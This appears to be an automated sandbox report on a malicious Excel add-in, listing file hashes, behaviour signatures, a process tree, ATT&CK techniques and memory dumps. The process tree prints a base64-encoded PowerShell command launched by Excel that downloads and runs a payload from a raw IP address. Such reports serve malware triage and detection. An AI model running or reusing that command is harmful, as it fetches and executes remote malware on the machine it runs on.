Analysis

  • max time kernel
    150s
  • max time network
    144s
  • platform
    windows10_x64
  • resource
    win10-en-20211014
  • submitted
    03-11-2021 13:32

General

  • Target

    5b9c94b55944d98483b6f79e0886baf344f579d4.xlam

  • Size

    17KB

  • MD5

    f4ea7a9daa7defa4e9e3c54301f31973

  • SHA1

    5b9c94b55944d98483b6f79e0886baf344f579d4

  • SHA256

    5115b61255546bf812e84d215a21c0257897397669df2dab882bfb29161e698d

  • SHA512

    7f67ed6aa41a22cd8e3b3dedfb6df4fa6a1400a766c2f8b151584e245c896cffc5aa1d52f23e2725066b7526fb82c6df4f2cc0793c94d55892ccd1559ca5662d

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 28 IoCs
  • Suspicious use of SetWindowsHookEx 10 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\5b9c94b55944d98483b6f79e0886baf344f579d4.xlam"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4340
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e SQBFAFgAIAAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAuAEkAbgB2AG8AawBlACgAJwANAAoAaAB0AHQAcAA6AC8ALwAxADcAOQAuADQAMwAuADEAOAA3AC4AMQAzADEALwB5AGoAcQBmAC8ARgBhAFQAUAAuAGoAcABnAA0ACgAnACkAOwAgAA0ACgBNAGgAUABKAGQATAByAE0AcABJAFAAbwB3AHMARwB0AGMAcABiAHQARwBPAHkATwB3AFEASQBRAGUAWgBLAHIAQgBNAEYAcABKAGkAaABZAFQAaQBOAGQASABLAE8ARgBUAFgAQwBOAGYAbwBhAFgATgBhAHoAdQBjAEUASABwAFgAQQBTAEUAUgB0AE4AVQBkAGMARAB5AGIAcgBpAEYAYwBjAFcAaABEAA0ACgA=
      2⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1016
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:4848

Network

MITRE ATT&CK Matrix ATT&CK v6

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1016-284-0x0000000000000000-mapping.dmp
  • memory/1016-325-0x000001E2BE058000-0x000001E2BE059000-memory.dmp
    Filesize

    4KB

  • memory/1016-321-0x000001E2D65A0000-0x000001E2D65A1000-memory.dmp
    Filesize

    4KB

  • memory/1016-306-0x000001E2BE056000-0x000001E2BE058000-memory.dmp
    Filesize

    8KB

  • memory/1016-305-0x000001E2BE053000-0x000001E2BE055000-memory.dmp
    Filesize

    8KB

  • memory/1016-304-0x000001E2BE050000-0x000001E2BE052000-memory.dmp
    Filesize

    8KB

  • memory/4340-122-0x0000026235560000-0x0000026235562000-memory.dmp
    Filesize

    8KB

  • memory/4340-125-0x0000026235560000-0x0000026235562000-memory.dmp
    Filesize

    8KB

  • memory/4340-124-0x00007FFE228C0000-0x00007FFE228D0000-memory.dmp
    Filesize

    64KB

  • memory/4340-123-0x0000026235560000-0x0000026235562000-memory.dmp
    Filesize

    8KB

  • memory/4340-118-0x00007FFE228C0000-0x00007FFE228D0000-memory.dmp
    Filesize

    64KB

  • memory/4340-121-0x00007FFE228C0000-0x00007FFE228D0000-memory.dmp
    Filesize

    64KB

  • memory/4340-120-0x00007FFE228C0000-0x00007FFE228D0000-memory.dmp
    Filesize

    64KB

  • memory/4340-119-0x00007FFE228C0000-0x00007FFE228D0000-memory.dmp
    Filesize

    64KB

  • memory/4848-310-0x000000000040675E-mapping.dmp
  • memory/4848-331-0x00000000055F0000-0x00000000055F1000-memory.dmp
    Filesize

    4KB